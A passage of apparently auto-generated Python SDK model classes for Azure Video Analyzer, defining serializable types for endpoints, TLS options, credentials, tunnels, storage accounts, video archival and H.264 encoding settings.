'endpoint': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'transport': {'key': 'transport', 'type': 'str'},
'endpoint': {'key': 'endpoint', 'type': 'EndpointBase'},
}
def __init__(
self,
**kwargs
):
super(RtspSource, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.RtspSource' # type: str
self.transport = kwargs.get('transport', None)
self.endpoint = kwargs['endpoint']
class TunnelBase(msrest.serialization.Model):
"""Base class for tunnel objects.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: SecureIotDeviceRemoteTunnel.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel': 'SecureIotDeviceRemoteTunnel'}
}
def __init__(
self,
**kwargs
):
super(TunnelBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class SecureIotDeviceRemoteTunnel(TunnelBase):
"""A remote tunnel securely established using IoT Hub device information.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param iot_hub_name: Required. Name of the IoT Hub.
:type iot_hub_name: str
:param device_id: Required. The IoT device id to use when establishing the remote tunnel. This
string is case-sensitive.
:type device_id: str
"""
_validation = {
'type': {'required': True},
'iot_hub_name': {'required': True},
'device_id': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'iot_hub_name': {'key': 'iotHubName', 'type': 'str'},
'device_id': {'key': 'deviceId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SecureIotDeviceRemoteTunnel, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel' # type: str
self.iot_hub_name = kwargs['iot_hub_name']
self.device_id = kwargs['device_id']
class ServiceSpecification(msrest.serialization.Model):
"""The service metric specifications.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar log_specifications: List of log specifications.
:vartype log_specifications: list[~video_analyzer.models.LogSpecification]
:ivar metric_specifications: List of metric specifications.
:vartype metric_specifications: list[~video_analyzer.models.MetricSpecification]
"""
_validation = {
'log_specifications': {'readonly': True},
'metric_specifications': {'readonly': True},
}
_attribute_map = {
'log_specifications': {'key': 'logSpecifications', 'type': '[LogSpecification]'},
'metric_specifications': {'key': 'metricSpecifications', 'type': '[MetricSpecification]'},
}
def __init__(
self,
**kwargs
):
super(ServiceSpecification, self).__init__(**kwargs)
self.log_specifications = None
self.metric_specifications = None
class SinkNodeBase(NodeBase):
"""Base class for topology sink nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoSink.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoSink': 'VideoSink'}
}
def __init__(
self,
**kwargs
):
super(SinkNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SinkNodeBase' # type: str
self.inputs = kwargs['inputs']
class Sku(msrest.serialization.Model):
"""The SKU details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param name: Required. The SKU name. Possible values include: "Live_S1", "Batch_S1".
:type name: str or ~video_analyzer.models.SkuName
:ivar tier: The SKU tier. Possible values include: "Standard".
:vartype tier: str or ~video_analyzer.models.SkuTier
"""
_validation = {
'name': {'required': True},
'tier': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'tier': {'key': 'tier', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Sku, self).__init__(**kwargs)
self.name = kwargs['name']
self.tier = None
class StorageAccount(msrest.serialization.Model):
"""The details about the associated storage account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param id: Required. The ID of the storage account resource. Video Analyzer relies on tables,
queues, and blobs. The primary storage account must be a Standard Storage account (either
Microsoft.ClassicStorage or Microsoft.Storage).
:type id: str
:param identity: A managed identity that Video Analyzer will use to access the storage account.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the storage account mapping.
:vartype status: str
"""
_validation = {
'id': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StorageAccount, self).__init__(**kwargs)
self.id = kwargs['id']
self.identity = kwargs.get('identity', None)
self.status = None
class SystemData(msrest.serialization.Model):
"""Metadata pertaining to creation and last modification of the resource.
:param created_by: The identity that created the resource.
:type created_by: str
:param created_by_type: The type of identity that created the resource. Possible values
include: "User", "Application", "ManagedIdentity", "Key".
:type created_by_type: str or ~video_analyzer.models.CreatedByType
:param created_at: The timestamp of resource creation (UTC).
:type created_at: ~datetime.datetime
:param last_modified_by: The identity that last modified the resource.
:type last_modified_by: str
:param last_modified_by_type: The type of identity that last modified the resource. Possible
values include: "User", "Application", "ManagedIdentity", "Key".
:type last_modified_by_type: str or ~video_analyzer.models.CreatedByType
:param last_modified_at: The timestamp of resource last modification (UTC).
:type last_modified_at: ~datetime.datetime
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_by_type': {'key': 'createdByType', 'type': 'str'},
'created_at': {'key': 'createdAt', 'type': 'iso-8601'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'},
'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'},
'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(SystemData, self).__init__(**kwargs)
self.created_by = kwargs.get('created_by', None)
self.created_by_type = kwargs.get('created_by_type', None)
self.created_at = kwargs.get('created_at', None)
self.last_modified_by = kwargs.get('last_modified_by', None)
self.last_modified_by_type = kwargs.get('last_modified_by_type', None)
self.last_modified_at = kwargs.get('last_modified_at', None)
class TimeSequenceBase(msrest.serialization.Model):
"""A sequence of datetime ranges as a string.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoSequenceAbsoluteTimeMarkers.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers': 'VideoSequenceAbsoluteTimeMarkers'}
}
def __init__(
self,
**kwargs
):
super(TimeSequenceBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class TlsEndpoint(EndpointBase):
"""TLS endpoint describes an endpoint that the pipeline can connect to over TLS transport (data is encrypted in transit).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
:param trusted_certificates: List of trusted certificate authorities when authenticating a TLS
connection. A null list designates that Azure Video Analyzer's list of trusted authorities
should be used.
:type trusted_certificates: ~video_analyzer.models.CertificateSource
:param validation_options: Validation options to use when authenticating a TLS connection. By
default, strict validation is used.
:type validation_options: ~video_analyzer.models.TlsValidationOptions
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
'trusted_certificates': {'key': 'trustedCertificates', 'type': 'CertificateSource'},
'validation_options': {'key': 'validationOptions', 'type': 'TlsValidationOptions'},
}
def __init__(
self,
**kwargs
):
super(TlsEndpoint, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.TlsEndpoint' # type: str
self.trusted_certificates = kwargs.get('trusted_certificates', None)
self.validation_options = kwargs.get('validation_options', None)
class TlsValidationOptions(msrest.serialization.Model):
"""Options for controlling the validation of TLS endpoints.
:param ignore_hostname: When set to 'true' causes the certificate subject name validation to be
skipped. Default is 'false'.
:type ignore_hostname: str
:param ignore_signature: When set to 'true' causes the certificate chain trust validation to be
skipped. Default is 'false'.
:type ignore_signature: str
"""
_attribute_map = {
'ignore_hostname': {'key': 'ignoreHostname', 'type': 'str'},
'ignore_signature': {'key': 'ignoreSignature', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TlsValidationOptions, self).__init__(**kwargs)
self.ignore_hostname = kwargs.get('ignore_hostname', None)
self.ignore_signature = kwargs.get('ignore_signature', None)
class TokenClaim(msrest.serialization.Model):
"""Properties for expected token claims.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the claim which must be present on the token.
:type name: str
:param value: Required. Expected value of the claim to be present on the token.
:type value: str
"""
_validation = {
'name': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TokenClaim, self).__init__(**kwargs)
self.name = kwargs['name']
self.value = kwargs['value']
class TrackedResource(Resource):
"""The resource model definition for an Azure Resource Manager tracked top level resource which has 'tags' and a 'location'.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TrackedResource, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.location = kwargs['location']
class UnsecuredEndpoint(EndpointBase):
"""Unsecured endpoint describes an endpoint that the pipeline can connect to over clear transport (no encryption in transit).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
}
def __init__(
self,
**kwargs
):
super(UnsecuredEndpoint, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.UnsecuredEndpoint' # type: str
class UserAssignedManagedIdentity(msrest.serialization.Model):
"""The details of the user assigned managed identity used by the Video Analyzer resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar client_id: The client ID.
:vartype client_id: str
:ivar principal_id: The principal ID.
:vartype principal_id: str
"""
_validation = {
'client_id': {'readonly': True},
'principal_id': {'readonly': True},
}
_attribute_map = {
'client_id': {'key': 'clientId', 'type': 'str'},
'principal_id': {'key': 'principalId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UserAssignedManagedIdentity, self).__init__(**kwargs)
self.client_id = None
self.principal_id = None
class UsernamePasswordCredentials(CredentialsBase):
"""Username and password credentials.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param username: Required. Username to be presented as part of the credentials.
:type username: str
:param password: Required. Password to be presented as part of the credentials. It is
recommended that this value is parameterized as a secret string in order to prevent this value
to be returned as part of the resource on API requests.
:type password: str
"""
_validation = {
'type': {'required': True},
'username': {'required': True},
'password': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'username': {'key': 'username', 'type': 'str'},
'password': {'key': 'password', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UsernamePasswordCredentials, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.UsernamePasswordCredentials' # type: str
self.username = kwargs['username']
self.password = kwargs['password']
class VideoAnalyzer(TrackedResource):
"""The Video Analyzer account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
:param identity: The identities associated to the Video Analyzer resource.
:type identity: ~video_analyzer.models.VideoAnalyzerIdentity
:param storage_accounts: The storage accounts for this resource.
:type storage_accounts: list[~video_analyzer.models.StorageAccount]
:ivar endpoints: The endpoints associated with this resource.
:vartype endpoints: list[~video_analyzer.models.Endpoint]
:param encryption: The account encryption properties.
:type encryption: ~video_analyzer.models.AccountEncryption
:param iot_hubs: The IoT Hubs for this resource.
:type iot_hubs: list[~video_analyzer.models.IotHub]
:param public_network_access: Whether or not public network access is allowed for resources
under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
:param network_access_control: Network access control for Video Analyzer.
:type network_access_control: ~video_analyzer.models.NetworkAccessControl
:ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values
include: "Failed", "InProgress", "Succeeded".
:vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
:ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
account.
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'location': {'required': True},
'endpoints': {'readonly': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzer, self).__init__(**kwargs)
self.identity = kwargs.get('identity', None)
self.storage_accounts = kwargs.get('storage_accounts', None)
self.endpoints = None
self.encryption = kwargs.get('encryption', None)
self.iot_hubs = kwargs.get('iot_hubs', None)
self.public_network_access = kwargs.get('public_network_access', None)
self.network_access_control = kwargs.get('network_access_control', None)
self.provisioning_state = None
self.private_endpoint_connections = None
class VideoAnalyzerCollection(msrest.serialization.Model):
"""A collection of VideoAnalyzer items.
:param value: A collection of VideoAnalyzer items.
:type value: list[~video_analyzer.models.VideoAnalyzer]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[VideoAnalyzer]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class VideoAnalyzerIdentity(msrest.serialization.Model):
"""The managed identity for the Video Analyzer resource.
All required parameters must be populated in order to send to Azure.
:param type: Required. The identity type.
:type type: str
:param user_assigned_identities: The User Assigned Managed Identities.
:type user_assigned_identities: dict[str, ~video_analyzer.models.UserAssignedManagedIdentity]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'user_assigned_identities': {'key': 'userAssignedIdentities', 'type': '{UserAssignedManagedIdentity}'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerIdentity, self).__init__(**kwargs)
self.type = kwargs['type']
self.user_assigned_identities = kwargs.get('user_assigned_identities', None)
class VideoAnalyzerOperationStatus(msrest.serialization.Model):
"""Status of video analyzer operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Operation identifier.
:type name: str
:param id: Operation resource ID.
:type id: str
:param start_time: Operation start time.
:type start_time: str
:param end_time: Operation end time.
:type end_time: str
:param status: Operation status.
:type status: str
:param error: The error detail.
:type error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerOperationStatus, self).__init__(**kwargs)
self.name = kwargs['name']
self.id = kwargs.get('id', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class VideoAnalyzerPrivateEndpointConnectionOperationStatus(msrest.serialization.Model):
"""Status of private endpoint connection operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Operation identifier.
:type name: str
:param id: Operation resource ID.
:type id: str
:param start_time: Operation start time.
:type start_time: str
:param end_time: Operation end time.
:type end_time: str
:param status: Operation status.
:type status: str
:param error: The error detail.
:type error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerPrivateEndpointConnectionOperationStatus, self).__init__(**kwargs)
self.name = kwargs['name']
self.id = kwargs.get('id', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class VideoAnalyzerUpdate(msrest.serialization.Model):
"""The update operation for a Video Analyzer account.
Variables are only populated by the server, and will be ignored when sending a request.
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param identity: The identities associated to the Video Analyzer resource.
:type identity: ~video_analyzer.models.VideoAnalyzerIdentity
:param storage_accounts: The storage accounts for this resource.
:type storage_accounts: list[~video_analyzer.models.StorageAccount]
:ivar endpoints: The endpoints associated with this resource.
:vartype endpoints: list[~video_analyzer.models.Endpoint]
:param encryption: The account encryption properties.
:type encryption: ~video_analyzer.models.AccountEncryption
:param iot_hubs: The IoT Hubs for this resource.
:type iot_hubs: list[~video_analyzer.models.IotHub]
:param public_network_access: Whether or not public network access is allowed for resources
under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
:param network_access_control: Network access control for Video Analyzer.
:type network_access_control: ~video_analyzer.models.NetworkAccessControl
:ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values
include: "Failed", "InProgress", "Succeeded".
:vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
:ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
account.
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_validation = {
'endpoints': {'readonly': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerUpdate, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.identity = kwargs.get('identity', None)
self.storage_accounts = kwargs.get('storage_accounts', None)
self.endpoints = None
self.encryption = kwargs.get('encryption', None)
self.iot_hubs = kwargs.get('iot_hubs', None)
self.public_network_access = kwargs.get('public_network_access', None)
self.network_access_control = kwargs.get('network_access_control', None)
self.provisioning_state = None
self.private_endpoint_connections = None
class VideoArchival(msrest.serialization.Model):
"""Video archival properties.
:param retention_period: Video retention period indicates the maximum age of the video archive
segments which are intended to be kept in storage. It must be provided in the ISO8601 duration
format in the granularity of days, up to a maximum of 10 years. For example, if this is set to
P30D (30 days), content older than 30 days will be periodically deleted. This value can be
updated at any time and the new desired retention period will be effective within 24 hours.
:type retention_period: str
"""
_attribute_map = {
'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoArchival, self).__init__(**kwargs)
self.retention_period = kwargs.get('retention_period', None)
class VideoContentToken(msrest.serialization.Model):
""""Video content token grants access to the video content URLs.".
Variables are only populated by the server, and will be ignored when sending a request.
:ivar expiration_date: The content token expiration date in ISO8601 format (eg.
2021-01-01T00:00:00Z).
:vartype expiration_date: ~datetime.datetime
:ivar token: The content token value to be added to the video content URL as the value for the
"token" query string parameter. The token is specific to a single video.
:vartype token: str
"""
_validation = {
'expiration_date': {'readonly': True},
'token': {'readonly': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
'token': {'key': 'token', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoContentToken, self).__init__(**kwargs)
self.expiration_date = None
self.token = None
class VideoContentUrls(msrest.serialization.Model):
"""Set of URLs to the video content.
:param download_url: Video file download URL. This URL can be used in conjunction with the
video content authorization token to download the video MP4 file. The resulting MP4 file can be
played on any standard media player. It is available when the video type is 'file' and video
file is available for consumption.
:type download_url: str
:param archive_base_url: Video archive streaming base URL. The archived content can be
automatically played by the Azure Video Analyzer player widget. Alternatively, this URL can be
used in conjunction with the video content authorization token on any compatible DASH or HLS
players by appending the following to the base URL:
.. code-block::
- HLSv4: /manifest(format=m3u8-aapl).m3u8
- HLS CMAF: /manifest(format=m3u8-cmaf)
- DASH CMAF: /manifest(format=mpd-time-cmaf)
Moreover, an ongoing video recording can be played in "live mode" with latencies which are
approximately double of the chosen video segment length. It is available when the video type is
'archive' and video archiving is enabled.
:type archive_base_url: str
:param rtsp_tunnel_url: Video low-latency streaming URL. The live content can be automatically
played by the Azure Video Analyzer player widget. Alternatively, this URL can be used in
conjunction with the video content authorization token to expose a WebSocket tunneled RTSP
stream. It is available when the video type is 'archive' and a live, low-latency feed is
available from the source.
:type rtsp_tunnel_url: str
:param preview_image_urls: Video preview image URLs. These URLs can be used in conjunction with
the video content authorization token to download the most recent still image from the video
archive in different resolutions. They are available when the video type is 'archive' and
preview images are enabled.
:type preview_image_urls: ~video_analyzer.models.VideoPreviewImageUrls
"""
_attribute_map = {
'download_url': {'key': 'downloadUrl', 'type': 'str'},
'archive_base_url': {'key': 'archiveBaseUrl', 'type': 'str'},
'rtsp_tunnel_url': {'key': 'rtspTunnelUrl', 'type': 'str'},
'preview_image_urls': {'key': 'previewImageUrls', 'type': 'VideoPreviewImageUrls'},
}
def __init__(
self,
**kwargs
):
super(VideoContentUrls, self).__init__(**kwargs)
self.download_url = kwargs.get('download_url', None)
self.archive_base_url = kwargs.get('archive_base_url', None)
self.rtsp_tunnel_url = kwargs.get('rtsp_tunnel_url', None)
self.preview_image_urls = kwargs.get('preview_image_urls', None)
class VideoCreationProperties(msrest.serialization.Model):
"""Optional properties to be used in case a new video resource needs to be created on the service. These will not take effect if the video already exists.
:param title: Optional title provided by the user. Value can be up to 256 characters long.
:type title: str
:param description: Optional description provided by the user. Value can be up to 2048
characters long.
:type description: str
:param segment_length: Segment length indicates the length of individual content files
(segments) which are persisted to storage. Smaller segments provide lower archive playback
latency but generate larger volume of storage transactions. Larger segments reduce the amount
of storage transactions while increasing the archive playback latency. Value must be specified
in ISO8601 duration format (i.e. "PT30S" equals 30 seconds) and can vary between 30 seconds to
5 minutes, in 30 seconds increments. Changing this value after the initial call to create the
video resource can lead to errors when uploading content to the archive. Default value is 30
seconds. This property is only allowed for topologies where "kind" is set to "live".
:type segment_length: str
:param retention_period: Video retention period indicates how long the video is kept in
storage. Value must be specified in ISO8601 duration format (i.e. "P1D" equals 1 day) and can
vary between 1 day to 10 years, in 1 day increments. When absent (null), all video content is
retained indefinitely. This property is only allowed for topologies where "kind" is set to
"live".
:type retention_period: str
"""
_attribute_map = {
'title': {'key': 'title', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'segment_length': {'key': 'segmentLength', 'type': 'str'},
'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoCreationProperties, self).__init__(**kwargs)
self.title = kwargs.get('title', None)
self.description = kwargs.get('description', None)
self.segment_length = kwargs.get('segment_length', None)
self.retention_period = kwargs.get('retention_period', None)
class VideoEncoderBase(msrest.serialization.Model):
"""Base type for all video encoding presets, which define the recipe or instructions on how the input video should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoEncoderH264.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video should
be encoded. If omitted, encoder sets it automatically to try and match the quality of the input
video.
:type bitrate_kbps: str
:param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
frame rate of the input video.
:type frame_rate: str
:param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
resolution of the input video.
:type scale: ~video_analyzer.models.VideoScale
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
'frame_rate': {'key': 'frameRate', 'type': 'str'},
'scale': {'key': 'scale', 'type': 'VideoScale'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoEncoderH264': 'VideoEncoderH264'}
}
def __init__(
self,
**kwargs
):
super(VideoEncoderBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.frame_rate = kwargs.get('frame_rate', None)
self.scale = kwargs.get('scale', None)
class VideoEncoderH264(VideoEncoderBase):
"""A custom preset for encoding video with the H.264 (AVC) codec.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video should
be encoded. If omitted, encoder sets it automatically to try and match the quality of the input
video.
:type bitrate_kbps: str
:param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
frame rate of the input video.
:type frame_rate: str
:param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
resolution of the input video.
:type scale: ~video_analyzer.models.VideoScale
"""
_validation = {
'type': {'required': True},
}
